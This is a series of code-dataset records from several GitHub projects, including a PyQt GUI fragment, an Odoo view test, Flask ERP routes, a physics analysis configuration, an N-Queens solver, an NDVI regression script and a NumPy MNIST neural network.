self.pushButton_4.setVisible(False)\n # self.pushButton_5.setVisible(False)\n # self.Init_EditCase(self.Pa_Info_path_arry[self.Pa_Info_current_index])\n # if self.Pa_Info_current_index == len(self.Pa_Info_path_arry):\n # self.pushButton_4.setEnabled(False)\n\n @pyqtSlot(str)\n def on_comboBox_2_currentIndexChanged(self, p0):\n _translate = QtCore.QCoreApplication.translate\n if p0 in ['双','三','四']:\n self.groupBox_4.setVisible(True)\n else:\n self.groupBox_4.setVisible(False)\n if p0 =='双':\n self.radioButton_2.setText(_translate(\"MainWindow\", \"2-1\"))\n self.radioButton_3.setText(_translate(\"MainWindow\", \"2-2\"))\n self.radioButton_4.setVisible(False)\n self.radioButton_5.setVisible(False)\n elif p0 =='三':\n self.radioButton_2.setText(_translate(\"MainWindow\", \"3-1\"))\n self.radioButton_3.setText(_translate(\"MainWindow\", \"3-2\"))\n 
self.radioButton_4.setText(_translate(\"MainWindow\", \"3-3\"))\n self.radioButton_4.setVisible(True)\n self.radioButton_5.setVisible(False)\n elif p0 =='四':\n self.radioButton_2.setText(_translate(\"MainWindow\", \"4-1\"))\n self.radioButton_3.setText(_translate(\"MainWindow\", \"4-2\"))\n self.radioButton_4.setText(_translate(\"MainWindow\", \"4-3\"))\n self.radioButton_5.setText(_translate(\"MainWindow\", \"4-4\"))\n self.radioButton_4.setVisible(True)\n self.radioButton_5.setVisible(True)\n\nif __name__ == \"__main__\":\n app = QtWidgets.QApplication(sys.argv)\n MainWindow2 = QtWidgets.QMainWindow()\n ui = MainWindow(MainWindow2)\n ui.show()\n sys.exit(app.exec_())\n \n","repo_name":"gesila820826/hospital_data_client-master","sub_path":"gui/src/hospital_upload.py","file_name":"hospital_upload.py","file_ext":"py","file_size_in_byte":50239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"71381453696","text":"from lxml import etree\n\nfrom odoo.tests.common import TransactionCase\n\n\nclass TestBaseViewInheritanceExtension(TransactionCase):\n def test_base_view_inheritance_extension(self):\n view_id = self.env.ref(\"base.view_partner_simple_form\").id\n fields_view_get = self.env[\"res.partner\"].fields_view_get(view_id=view_id)\n view = etree.fromstring(fields_view_get[\"arch\"])\n # verify normal attributes work\n self.assertEqual(view.xpath(\"//form\")[0].get(\"string\"), \"Partner form\")\n # verify our extra context key worked\n self.assertTrue(\n \"default_name\" in view.xpath('//field[@name=\"parent_id\"]')[0].get(\"context\")\n )\n self.assertTrue(\n \"context.get('company_id', context.get('company'))\"\n in view.xpath('//field[@name=\"parent_id\"]')[0].get(\"context\")\n )\n\n def test_list_add(self):\n view_model = self.env[\"ir.ui.view\"]\n source = etree.fromstring(\n \"\"\"\\\n
            <form>\n                <button name=\"test\" states=\"draft,open\"/>\n            </form>\n            \"\"\"\n        )\n        # NOTE: the XML literals in this file were lost to markup stripping; they are reconstructed here from the assertions that follow.\n        # extend with single value\n        specs = etree.fromstring(\n            \"\"\"\\\n            <button name=\"test\" position=\"attributes\">\n                <attribute name=\"states\" operation=\"list_add\">valid</attribute>\n            </button>\n            \"\"\"\n        )\n        modified_source = view_model.inheritance_handler_attributes_list_add(\n            source, specs\n        )\n        button_node = modified_source.xpath('//button[@name=\"test\"]')[0]\n        self.assertEqual(button_node.attrib[\"states\"], \"draft,open,valid\")\n        # extend with list of values\n        specs = etree.fromstring(\n            \"\"\"\\\n            <button name=\"test\" position=\"attributes\">\n                <attribute name=\"states\" operation=\"list_add\">payable,paid</attribute>\n            </button>\n            \"\"\"\n        )\n        modified_source = view_model.inheritance_handler_attributes_list_add(\n            source, specs\n        )\n        button_node = modified_source.xpath('//button[@name=\"test\"]')[0]\n        self.assertEqual(button_node.attrib[\"states\"], \"draft,open,valid,payable,paid\")\n\n    def test_list_remove(self):\n        view_model = self.env[\"ir.ui.view\"]\n        source = etree.fromstring(\n            \"\"\"\\\n            <form>\n                <button name=\"test\" states=\"draft,open,valid,paid\"/>\n            </form>\n            \"\"\"\n        )\n        specs = etree.fromstring(\n            \"\"\"\\\n            <button name=\"test\" position=\"attributes\">\n                <attribute name=\"states\" operation=\"list_remove\">open</attribute>\n            </button>\n            \"\"\"\n        )\n        modified_source = view_model.inheritance_handler_attributes_list_remove(\n            source, specs\n        )\n        button_node = modified_source.xpath('//button[@name=\"test\"]')[0]\n        self.assertEqual(button_node.attrib[\"states\"], \"draft,valid,paid\")\n\n    def test_python_dict_inheritance(self):\n        view_model = self.env[\"ir.ui.view\"]\n        source = etree.fromstring(\n            \"\"\"\\\n            <form>\n                <field name=\"invoice_line_ids\" context=\"{'default_type': context.get('default_type'), 'journal_id': journal_id, 'default_currency_id': currency_id != company_currency_id and currency_id or False, 'default_cost_center_id': 'cost_center_id'}\"/>\n            </form>\n            \"\"\"\n        )\n        specs = etree.fromstring(\n            \"\"\"\\\n            <field name=\"invoice_line_ids\" position=\"attributes\">\n                <attribute name=\"context\" operation=\"python_dict\" key=\"my_key\">my_value</attribute>\n                <attribute name=\"context\" operation=\"python_dict\" key=\"default_name\">'my name'</attribute>\n                <attribute name=\"context\" operation=\"python_dict\" key=\"default_cost_center_id\">cost_center_id</attribute>\n            </field>\n            \"\"\"\n        )\n        modified_source = view_model.inheritance_handler_attributes_python_dict(\n            source, specs\n        )\n        field_node = modified_source.xpath('//field[@name=\"invoice_line_ids\"]')[0]\n        self.assertTrue(\n            \"currency_id != company_currency_id and currency_id or False\"\n            in field_node.attrib[\"context\"]\n        )\n        self.assertTrue(\"my_value\" in field_node.attrib[\"context\"])\n        self.assertFalse(\"'cost_center_id'\" in field_node.attrib[\"context\"])\n","repo_name":"dhongu/others_addons","sub_path":".unsed/base_view_inheritance_extension/tests/test_base_view_inheritance_extension.py","file_name":"test_base_view_inheritance_extension.py","file_ext":"py","file_size_in_byte":4860,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"79"}
{"seq_id":"32239081791","text":"# -*- coding: UTF-8 -*-\nimport json\nfrom flask import render_template, session, request\nfrom auth.login_required import login_required\nfrom auth.permission_required import permission_required\nfrom webapp import app\nfrom webapp.mylog import log\nfrom db.db_mission import *\n\n__author__ = 'sonnyhcl'\n\n\n@app.route('/mission', methods=['GET'])\n@login_required\ndef mission_index():\n    return render_template('mission.html')\n\n\n@app.route('/mission/table', methods=['POST'])\n@login_required\ndef get_mission_by_cid():\n    \"\"\"\n    Return the missions for community c_id.\n    c_id=0 means return all missions.\n    :return: \n    \"\"\"\n    ret = {\"data\": [], \"status\": 'Success', \"msg\": \"\"}\n    c_id = session.get('c_id')\n    status, info = mission.get_mission_by_cid(c_id)\n    if status == \"Success\":\n        _ = [ret['data'].append({'m_id': i[0], 'm_amount': i[1], 'm_note': i[2],\n                                 'u_id': i[3], \"i_id\": i[4], \"o_id\": i[6],\n                                 \"o_amount\": i[7], 'u_name': i[23],\n                                 'p_name': i[14], 'i_name': i[17]})\n             for i in info\n             if session['u_role'] == 'root' or session['u_role'] == 'admin'\n             or (session['u_role'] == 'user' and session['u_id'] == i[3])\n             ]\n    else:\n        ret['msg'] = info\n\n    return json.dumps(ret, ensure_ascii=False)\n\n\n@app.route('/mission/add', methods=['POST'])\n@permission_required('admin')\n@login_required\ndef add_mission():\n    \"\"\"\n\n    :return: {\"status\": \"Success\", \"msg\":\"error_msg\"}\n    \"\"\"\n    ret = {\"status\": \"Success\", \"msg\": \"error_msg\"}\n    u_id = request.form.get('u_id')\n    i_id = request.form.get('i_id')\n    o_id = request.form.get('o_id')\n    m_amount = request.form.get('m_amount')\n    m_note = request.form.get('m_note')\n    ret['status'], ret['msg'] = \\\n        mission.add_mission(u_id, i_id, o_id, m_amount, m_note)\n\n    return json.dumps(ret, ensure_ascii=False)\n\n\n@app.route('/mission/modify', methods=['POST'])\n@permission_required('admin')\n@login_required\ndef modify_mission():\n    \"\"\"\n\n    :return: {\"status\": \"Success\", \"msg\":\"error_msg\"}\n    \"\"\"\n    ret = {\"status\": \"Success\", \"msg\": \"error_msg\"}\n\n    m_id = request.form.get('m_id')\n    m_amount = request.form.get('m_amount')\n    m_note = request.form.get('m_note')\n    u_id = request.form.get('u_id')\n    i_id = request.form.get('i_id')\n    o_id = request.form.get('o_id')\n    ret['status'], ret['msg'] = \\\n        mission.update_mission(m_id, m_amount, m_note, u_id, i_id, o_id)\n\n    return json.dumps(ret, ensure_ascii=False)\n\n\n@app.route('/mission/delete', methods=['POST'])\n@permission_required('admin')\n@login_required\ndef delete_mission():\n    \"\"\"\n\n    :return: {\"status\": \"Success\", \"msg\":\"error_msg\"}\n    \"\"\"\n    ret = {\"status\": \"Success\", \"msg\": 
\"error_msg\"}\n m_id = request.form.get('m_id')\n ret['status'], ret['msg'] = mission.delete_mission(m_id)\n\n return json.dumps(ret, ensure_ascii=False)\n","repo_name":"sonnyhcl/Simple-ERP-System","sub_path":"webapp/views/mission.py","file_name":"mission.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"79"} +{"seq_id":"16542232480","text":"\n##____________________________________________________________________________||\nfrom PhysicsTools.PatAlgos.patTemplate_cfg import *\n\n##____________________________________________________________________________||\nimport FWCore.ParameterSet.VarParsing as VarParsing\noptions = VarParsing.VarParsing('analysis')\noptions.inputFiles = 'file:/afs/cern.ch/cms/Tutorials/TWIKI_DATA/MET/TTJets_AODSIM_532_numEvent100.root', \noptions.outputFile = 'patTuple_typeI_pf2pat.root'\noptions.maxEvents = -1\noptions.parseArguments()\n\n##____________________________________________________________________________||\nprocess.maxEvents = cms.untracked.PSet(input = cms.untracked.int32(options.maxEvents))\nprocess.MessageLogger.cerr.FwkReport.reportEvery = 10\n\n##____________________________________________________________________________||\nprocess.load(\"PhysicsTools.PatAlgos.patSequences_cff\")\n\n##____________________________________________________________________________||\nfrom PhysicsTools.PatAlgos.tools.pfTools import *\n\n##____________________________________________________________________________||\nprocess.load(\"PhysicsTools.PatUtils.patPFMETCorrections_cff\")\nprocess.producePatPFMETCorrections.replace(\n process.pfCandMETcorr,\n process.type0PFMEtCorrection *\n process.patPFMETtype0Corr *\n process.pfCandMETcorr \n )\n\npostfix = \"PFlow\"\njetAlgo=\"AK5\"\nusePF2PAT(process, \n runPF2PAT = True,\n jetAlgo = jetAlgo,\n runOnMC = True,\n postfix = postfix, \n typeIMetCorrections = True\n )\n\ngetattr(process,'patMETs'+postfix).metSource = cms.InputTag(\"patType1CorrectedPFMet\"+postfix)\n\ngetattr(process,'patType1CorrectedPFMet'+postfix).srcType1Corrections = cms.VInputTag(\n cms.InputTag(\"patPFJetMETtype1p2Corr\"+postfix,\"type1\"),\n cms.InputTag(\"patPFMETtype0Corr\"+postfix)\n)\n\n##____________________________________________________________________________||\nprocess.source = cms.Source(\n \"PoolSource\",\n fileNames = cms.untracked.vstring(options.inputFiles)\n )\n\n##____________________________________________________________________________||\n# process.p = cms.Path(\n# process.type0PFMEtCorrection *\n# process.patDefaultSequence\n# )\n\nprocess.p = cms.Path(\n getattr(process,\"patPF2PATSequence\"+postfix)\n)\n\n##____________________________________________________________________________||\nprocess.out.fileName = cms.untracked.string(options.outputFile)\nprocess.out.outputCommands = cms.untracked.vstring(\n 'keep *',\n # 'drop *',\n # 'keep patMETs_patMETs__PAT',\n ) \n\n##____________________________________________________________________________||\n","repo_name":"TaiSakuma/metrecoat","sub_path":"python_typeI_pf2pat_cfg.py","file_name":"python_typeI_pf2pat_cfg.py","file_ext":"py","file_size_in_byte":2629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"12695731609","text":"class Solution:\n def solveNQueens(self, n: int) -> List[List[str]]:\n \"\"\"\n General idea: Fill boards by row using while loop and a list of boards\n 1. 
Initialize board - list of boards with all options to occupy first row. Store there a tuple of (row, column). \n 2. Use while loop until boards will become empty: all boards will be filled up until last row and will be appended to the list of results\n 1. Pop a board from boards\n 2. If the size is n - it's already full -> append to res\n 3. Iterate through possible values for the column and append to board possible (row, column), where row - is the size of board and is also current row. \n \"\"\"\n boards = [[(0, i)] for i in range(n)]\n res = []\n while boards:\n board = boards.pop()\n row = len(board)\n if row == n:\n res.append([\n ''.join('Q' if i == c else '.' for i in range(n))\n for r, c in board])\n for column in range(n):\n if all(column != c and abs(column - c) != abs(row - r) for r, c in board):\n boards.append(board + [(row, column)])\n return res\n ","repo_name":"Margarita89/LeetCode","sub_path":"0051_N-Queens.py","file_name":"0051_N-Queens.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"24498141505","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 21 12:49:23 2021\r\n\r\n@author: brian\r\n\"\"\"\r\n\r\n#import Packages\r\nimport csv\r\nimport numpy as np\r\nimport pandas as pd\r\nimport datetime as dt\r\nimport scipy.stats\r\nimport statsmodels.api as sm\r\nimport statsmodels.formula.api as smf\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import r2_score\r\nfrom sklearn.metrics import mean_squared_error\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom math import sqrt\r\nfrom sklearn.linear_model import LinearRegression\r\nfrom sklearn.model_selection import cross_val_score\r\n\r\n\r\n#import EVI data\r\nNDVI = pd.read_csv (r'C:\\Users\\brian\\OneDrive\\Desktop\\SIP\\Data\\Sandy_3_Allotment\\S3_WB_NDVI.csv')\r\n\r\n#change date to datetime\r\nNDVI['date'] = pd.to_datetime(NDVI['date']).dt.tz_localize(None)\r\n\r\n#drop NA values\r\nNDVI.dropna(subset = ['scaled NDVI3'], inplace = True)\r\n\r\n\r\n###Calculate R2 and MSE for periodic values\r\n\r\n#create blank dataframe of just growing season data\r\nGS = pd.DataFrame()\r\nPeriod = [5,6,7,8,9,10,11,12,13,14,15,16,17,18,19]\r\nDates = ['March 6 - March 21', 'March 22 - April 6', 'April 7 - April 22', 'April 23 - May 8', 'May 9 - May 24', 'May 25 - June 9', 'June 10 - June 25', 'June 26 - July 11', 'July 12 - July 27', 'July 28 - August 12', 'August 13 - August 28', 'August 29 - September 13', 'September 14 - September 29', 'September 30 - October 14', 'October 15 - October 31']\r\nGS['Date Range'] = Dates\r\nGS['Period'] = Period\r\nGS['r^2 of Deficit vs. EVI'] = np.nan\r\nGS['r^2 of AET vs. EVI'] = np.nan\r\nGS['r^2 of SM vs. EVI'] = np.nan\r\nGS['r^2 of MELT vs. EVI'] = np.nan\r\nGS['r^2 of W vs. EVI'] = np.nan\r\nGS['rMSE of Deficit vs. EVI'] = np.nan \r\nGS['rMSE of AET vs. EVI'] = np.nan\r\nGS['rMSE of SM vs. EVI'] = np.nan\r\nGS['rMSE of MELT vs. EVI'] = np.nan\r\nGS['rMSE of W vs. EVI'] = np.nan\r\nGS['AIC of Deficit vs. EVI'] = np.nan \r\nGS['AIC of AET vs. EVI'] = np.nan\r\nGS['AIC of SM vs. EVI'] = np.nan\r\nGS['AIC of MELT vs. EVI'] = np.nan\r\nGS['AIC of W vs. 
EVI'] = np.nan\r\n\r\n#Create a blank dataframe that stores the best relationship slope intercept and r2 value\r\nBest = pd.DataFrame()\r\nBest['Date Range'] = Dates\r\nBest['Period'] = Period\r\nBest['Best Predictor(s)'] = ''\r\nBest['r^2'] = np.nan\r\nBest['rMSE'] = np.nan\r\nBest['AIC'] = np.nan\r\n \r\n\r\n# loop through the data and Calculate R2 and MSE for all of the different periods\r\n\r\nfor i in range(5,20,1):\r\n \r\n EVI_p = NDVI[NDVI[\"Period\"] == i]\r\n \r\n \r\n ####Deficit Vs. EVI\r\n X_trainD, X_testD, y_trainD, y_testD = train_test_split(EVI_p['Sum of D'], EVI_p['scaled NDVI3'], test_size=0.25, random_state=12)\r\n\r\n #Establish a linear relationship between test and training data\r\n slopeD, interceptD, r_valueD, p_valueD, std_errD = scipy.stats.linregress(X_trainD, y_trainD)\r\n r2D = ((r_valueD**2))\r\n GS.at[i-5,'r^2 of Deficit vs. EVI'] =r2D\r\n\r\n #try relationship with test data\r\n y_predictD = (slopeD*X_testD) + interceptD\r\n\r\n #calculate MSE between y_predict and y_test\r\n AICD = 2 - (2*np.log((sum((y_testD-y_predictD)**2))))\r\n GS.at[i-5,'AIC of Deficit vs. EVI'] = AICD\r\n rMSED = sqrt(mean_squared_error(y_testD, y_predictD))\r\n GS.at[i-5,'rMSE of Deficit vs. EVI'] = rMSED\r\n\r\n\r\n ###AET vs EVI\r\n X_trainA, X_testA, y_trainA, y_testA = train_test_split(EVI_p['Sum of AET'], EVI_p['scaled NDVI3'], test_size=0.25, random_state=12)\r\n\r\n #Establish a linear relationship between test and training data\r\n slopeA, interceptA, r_valueA, p_valueA, std_errA = scipy.stats.linregress(X_trainA, y_trainA)\r\n r2A = ((r_valueA**2))\r\n GS.at[i-5,'r^2 of AET vs. EVI'] =r2A\r\n\r\n #try relationship with test data\r\n y_predictA = (slopeA*X_testA) + interceptA\r\n\r\n #calculate MSE between y_predict and y_test\r\n AICA = 2 - (2*np.log((sum((y_testA-y_predictA)**2))))\r\n GS.at[i-5,'AIC of AET vs. EVI'] = AICA\r\n rMSEA = sqrt(mean_squared_error(y_testA, y_predictA))\r\n GS.at[i-5,'rMSE of AET vs. EVI'] = rMSEA\r\n\r\n\r\n ###SM vs. EVI\r\n X_trainS, X_testS, y_trainS, y_testS = train_test_split(EVI_p['Average of SOIL'], EVI_p['scaled NDVI3'], test_size=0.25, random_state=12)\r\n\r\n #Establish a linear relationship between test and training data\r\n slopeS, interceptS, r_valueS, p_valueS, std_errS = scipy.stats.linregress(X_trainS, y_trainS)\r\n r2S = ((r_valueS**2))\r\n GS.at[i-5,'r^2 of SM vs. EVI'] =r2S\r\n\r\n #try relationship with test data\r\n y_predictS = (slopeS*X_testS) + interceptS\r\n\r\n #calculate MSE between y_predict and y_test\r\n AICS = 2 - (2*np.log((sum((y_testS-y_predictS)**2))))\r\n GS.at[i-5,'AIC of SM vs. EVI'] = AICS\r\n rMSES = sqrt(mean_squared_error(y_testS, y_predictS))\r\n GS.at[i-5,'rMSE of SM vs. EVI'] = rMSES\r\n \r\n \r\n ###W vs. EVI\r\n X_trainW, X_testW, y_trainW, y_testW = train_test_split(EVI_p['Sum of W'], EVI_p['scaled NDVI3'], test_size=0.25, random_state=12)\r\n\r\n #Establish a linear relationship between test and training data\r\n slopeW, interceptW, r_valueW, p_valueW, std_errW = scipy.stats.linregress(X_trainW, y_trainW)\r\n r2W = ((r_valueW**2))\r\n GS.at[i-5,'r^2 of W vs. EVI'] =r2W\r\n\r\n #try relationship with test data\r\n y_predictW = (slopeW*X_testW) + interceptW\r\n\r\n #calculate MSE between y_predict and y_test\r\n AICW = 2 - (2*np.log((sum((y_testW-y_predictW)**2))))\r\n GS.at[i-5,'AIC of W vs. EVI'] = AICW\r\n rMSEW = sqrt(mean_squared_error(y_testW, y_predictW))\r\n GS.at[i-5,'rMSE of W vs. 
EVI'] = rMSEW\r\n    \r\n    ###Figure out the best model fit for each period\r\n    r2_list = [r2D, r2A, r2S, r2W]\r\n    best_r2 = r2_list.index(max(r2_list))\r\n    \r\n    if best_r2 == 0:\r\n        Best.at[i-5,'Best Predictor(s)'] = 'Deficit (D)'\r\n        Best.at[i-5,'r^2'] = r2D\r\n        Best.at[i-5,'Intercept'] = interceptD\r\n        Best.at[i-5,'Coefficient'] = slopeD\r\n        Best.at[i-5,'AIC'] = AICD\r\n        Best.at[i-5,'rMSE'] = rMSED\r\n        \r\n        \r\n    elif best_r2 ==1 :\r\n        Best.at[i-5,'Best Predictor(s)'] = 'AET'\r\n        Best.at[i-5,'r^2'] = r2A\r\n        Best.at[i-5,'Intercept'] = interceptA\r\n        Best.at[i-5,'Coefficient'] = slopeA\r\n        Best.at[i-5,'AIC'] = AICA\r\n        Best.at[i-5,'rMSE'] = rMSEA\r\n        \r\n        \r\n    elif best_r2 ==2:\r\n        Best.at[i-5,'Best Predictor(s)'] = 'Soil Moisture (SM)'\r\n        Best.at[i-5,'r^2'] = r2S\r\n        Best.at[i-5,'Intercept'] = interceptS\r\n        Best.at[i-5,'Coefficient'] = slopeS\r\n        Best.at[i-5,'AIC'] = AICS\r\n        Best.at[i-5,'rMSE'] = rMSES\r\n        \r\n        \r\n    elif best_r2 ==3:\r\n        Best.at[i-5,'Best Predictor(s)'] = 'W'\r\n        Best.at[i-5,'r^2'] = r2W\r\n        Best.at[i-5,'Intercept'] = interceptW\r\n        Best.at[i-5,'Coefficient'] = slopeW\r\n        Best.at[i-5,'AIC'] = AICW\r\n        Best.at[i-5,'rMSE'] = rMSEW\r\n","repo_name":"Schlaff/SIP","sub_path":"Sandy3 Allotment/NDVI_WB_Relationships.py","file_name":"NDVI_WB_Relationships.py","file_ext":"py","file_size_in_byte":6775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
{"seq_id":"73169100415","text":"from util import *\nfrom mnist_loader import load_mnist\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\n\nnp.random.seed(34)\n\ndef np_log(x):\n    return np.log(np.clip(x, 1e-10, x))\n\n\n# cross entropy error\ndef calc_loss(t, y):\n    return - (t * np_log(y)).sum(axis=1).mean()\n\n\n# Stochastic Gradient Descent\nclass SGD:\n    def __init__(self, lr=0.01):\n        self.lr = lr\n\n    def update_params(self, w1, w2, b1, b2, dw1, dw2, db1, db2):\n        w2 -= self.lr * dw2\n        w1 -= self.lr * dw1\n        b2 -= self.lr * db2\n        b1 -= self.lr * db1\n        return w1, w2, b1, b2\n\n\nclass Momentum:\n    def __init__(self, lr=0.01, momentum=0.9):\n        self.lr = lr\n        self.momentum = momentum\n        self.is_initialized = False\n        self.v_w1 = None\n        self.v_w2 = None\n        self.v_b1 = None\n        self.v_b2 = None\n\n    def update_params(self, w1, w2, b1, b2, dw1, dw2, db1, db2):\n        if not self.is_initialized:\n            self.v_w1 = np.zeros_like(w1)\n            self.v_w2 = np.zeros_like(w2)\n            self.v_b1 = np.zeros_like(b1)\n            self.v_b2 = np.zeros_like(b2)\n            self.is_initialized = True\n\n        self.v_w1 = self.momentum * self.v_w1 - self.lr * dw1\n        w1 = w1 + self.v_w1\n\n        self.v_w2 = self.momentum * self.v_w2 - self.lr * dw2\n        w2 = w2 + self.v_w2\n\n        self.v_b1 = self.momentum * self.v_b1 - self.lr * db1\n        b1 = b1 + self.v_b1\n\n        self.v_b2 = self.momentum * self.v_b2 - self.lr * db2\n        b2 = b2 + self.v_b2\n\n        return w1, w2, b1, b2\n\n\nclass AdaGrad:\n    def __init__(self, lr=0.01):\n        self.lr = lr\n        self.is_initialized = False\n        self.h_w1 = None\n        self.h_w2 = None\n        self.h_b1 = None\n        self.h_b2 = None\n\n    def update_params(self, w1, w2, b1, b2, dw1, dw2, db1, db2):\n        if not self.is_initialized:\n            self.h_w1 = np.zeros_like(w1)\n            self.h_w2 = np.zeros_like(w2)\n            self.h_b1 = np.zeros_like(b1)\n            self.h_b2 = np.zeros_like(b2)\n            self.is_initialized = True\n\n        # accumulate the squared gradients\n        self.h_w1 = self.h_w1 + dw1 * dw1\n        w1 = w1 - self.lr * dw1 / (np.sqrt(self.h_w1) + 1e-7)\n\n        self.h_w2 = self.h_w2 + dw2 * dw2\n        w2 = w2 - self.lr * dw2 / (np.sqrt(self.h_w2) + 1e-7)\n\n        self.h_b1 = self.h_b1 + db1 * db1\n        b1 = b1 - self.lr * 
db1 / (np.sqrt(self.h_b1) + 1e-7)\n\n        self.h_b2 = self.h_b2 + db2 * db2\n        b2 = b2 - self.lr * db2 / (np.sqrt(self.h_b2) + 1e-7)\n\n        return w1, w2, b1, b2\n\n\ndef initialize_weights_lecun_uniform(dim1, dim2):\n    return np.random.uniform(low=-np.sqrt(1.0/dim1),\n                             high=np.sqrt(1.0/dim1),\n                             size=(dim1, dim2)).astype('float32')\n\n\ndef initialize_weights_xavier_uniform(dim1, dim2):\n    return np.random.uniform(low=-np.sqrt(6.0/(dim1 + dim2)),\n                             high=np.sqrt(6.0/(dim1 + dim2)),\n                             size=(dim1, dim2)).astype('float32')\n\n\ndef initialize_weights_he_normal(dim1, dim2):\n    return np.sqrt(2.0 / dim1) * np.random.normal(size=(dim1, dim2))\n\n\nclass TwoLayerNet:\n    def __init__(self, optimizer):\n        self.optimizer = optimizer\n        self.layer1 = None\n        self.relu_layer = None\n        self.layer2 = None\n        self.softmax_with_loss_layer = None\n\n    def train(self, x, t):\n        # forward\n        y = self._forward(x)\n\n        # backward\n        delta2 = self.softmax_with_loss_layer.backward(y, t)\n        dx2 = self.layer2.backward(delta2)\n        delta1 = self.relu_layer.backward(dx2)\n        self.layer1.backward(delta1)\n\n        # get new params\n        w1, w2, b1, b2 = self.optimizer.update_params(\n            w1=self.layer1.w,\n            w2=self.layer2.w,\n            b1=self.layer1.b,\n            b2=self.layer2.b,\n            dw1=self.layer1.dw,\n            dw2=self.layer2.dw,\n            db1=self.layer1.db,\n            db2=self.layer2.db)\n\n        # update params\n        self.layer1.w = w1\n        self.layer1.b = b1\n        self.layer2.w = w2\n        self.layer2.b = b2\n\n\n    def predict(self, x):\n        return self._forward(x)\n\n\n    def _forward(self, x):\n        u1 = self.layer1.forward(x)\n        h1 = self.relu_layer.forward(u1)\n        u2 = self.layer2.forward(h1)\n        return self.softmax_with_loss_layer.forward(u2)\n\n\nclass Dense:\n    def __init__(self, n_in, n_out):\n        self.w = initialize_weights_he_normal(n_in, n_out)\n        self.b = np.zeros(n_out).astype('float32')\n        self.dw = None\n        self.db = None\n        self.x = None\n        self.u = None\n\n    def forward(self, x):\n        self.x = x\n        self.u = np.matmul(x, self.w) + self.b\n        return self.u\n\n    def backward(self, delta):\n        self.dw = np.matmul(self.x.T, delta)\n        self.db = np.sum(delta, axis=0) # sum for batch\n        dx = np.matmul(delta, self.w.T)\n        return dx\n\n\nclass SoftmaxWithLoss:\n    def forward(self, x):\n        return softmax(x)\n\n    def backward(self, y, t):\n        batch_size = y.shape[0]\n        return (y - t) / batch_size # div for batch\n\n\nclass Relu:\n    def __init__(self):\n        self.x = None\n\n    def forward(self, x):\n        self.x = x\n        return relu(self.x)\n\n    def backward(self, dx):\n        return dx * deriv_relu(self.x)\n\n\n# load datas\nx_train, t_train, x_test, t_test = load_mnist()\n\n# normalize\nx_train = x_train / 255\nx_test = x_test / 255\n\n# convert to one-hot\nt_train = np.eye(10)[t_train]\n\n# train valid split\nx_train, x_valid, t_train, t_valid = train_test_split(x_train, t_train, test_size=0.2)\n#x_train, t_train, x_test, t_test = x_train[0:101], t_train[0:101], x_test[0:101], t_test[0:101]\n\n\n# build network\nnetwork = TwoLayerNet(optimizer=SGD(lr=0.01))\nnetwork.layer1 = Dense(784, 100)\nnetwork.relu_layer = Relu()\nnetwork.layer2 = Dense(100, 10)\nnetwork.softmax_with_loss_layer = SoftmaxWithLoss()\n\n# loop epoch\nepochs = 3\nbatch_size = 50\nn_batch = len(x_train) // batch_size\n\nprint(\"start train...epochs: {}\".format(epochs))\nfor epoch in range(epochs):\n    x_train, t_train = shuffle(x_train, t_train)\n\n    # train\n    for i in range(n_batch):\n        start = batch_size * i\n        end = start + batch_size\n        x = x_train[start:end]\n        t = t_train[start:end]\n        network.train(x, t)\n\n    # train loss, acc\n    y_train = network.predict(x_train)\n    train_loss = calc_loss(t_train, y_train)\n    
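The `SoftmaxWithLoss` layer in the record above relies on the standard identity that the gradient of mean cross-entropy with respect to the softmax inputs is `(y - t) / batch_size`. A quick standalone check with toy NumPy values (illustrative only, not part of the original repository) compares that analytic gradient against a finite-difference estimate:

```python
import numpy as np

def softmax(x):
    # numerically stable softmax, row-wise
    e = np.exp(x - x.max(axis=1, keepdims=True))
    return e / e.sum(axis=1, keepdims=True)

def cross_entropy(y, t):
    # mean cross-entropy over the batch
    return -(t * np.log(np.clip(y, 1e-10, None))).sum(axis=1).mean()

rng = np.random.default_rng(0)
x = rng.normal(size=(4, 3))              # logits: batch of 4, 3 classes
t = np.eye(3)[rng.integers(0, 3, 4)]     # one-hot targets

analytic = (softmax(x) - t) / x.shape[0]  # the (y - t) / batch_size identity

# central finite differences, one coordinate at a time
numeric = np.zeros_like(x)
eps = 1e-6
for i in range(x.shape[0]):
    for j in range(x.shape[1]):
        xp, xm = x.copy(), x.copy()
        xp[i, j] += eps
        xm[i, j] -= eps
        numeric[i, j] = (cross_entropy(softmax(xp), t)
                         - cross_entropy(softmax(xm), t)) / (2 * eps)

print(np.abs(analytic - numeric).max())   # ~1e-10: the gradients agree
```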
train_acc = accuracy_score(y_train.argmax(axis=1), t_train.argmax(axis=1))\n\n    # validation loss, acc\n    y_valid = network.predict(x_valid)\n    valid_loss = calc_loss(t_valid, y_valid)\n    valid_acc = accuracy_score(y_valid.argmax(axis=1), t_valid.argmax(axis=1))\n    print(\"[epoch {}] train loss: {:.3f}, train acc: {:.3f}, valid loss: {:.3f}, valid acc: {:.3f}\".format(\n        epoch, train_loss, train_acc, valid_loss, valid_acc))\n\n\nprint(\"start predict..\")\ny_test = network.predict(x_test)\nacc = accuracy_score(y_test.argmax(axis=1), t_test)\nprint(\"accuracy_score:{}\".format(acc))\nprint(\"done\")\n","repo_name":"maeharin/handmade-deeplearning","sub_path":"python/mnist/04_mnist_class_style.py","file_name":"04_mnist_class_style.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
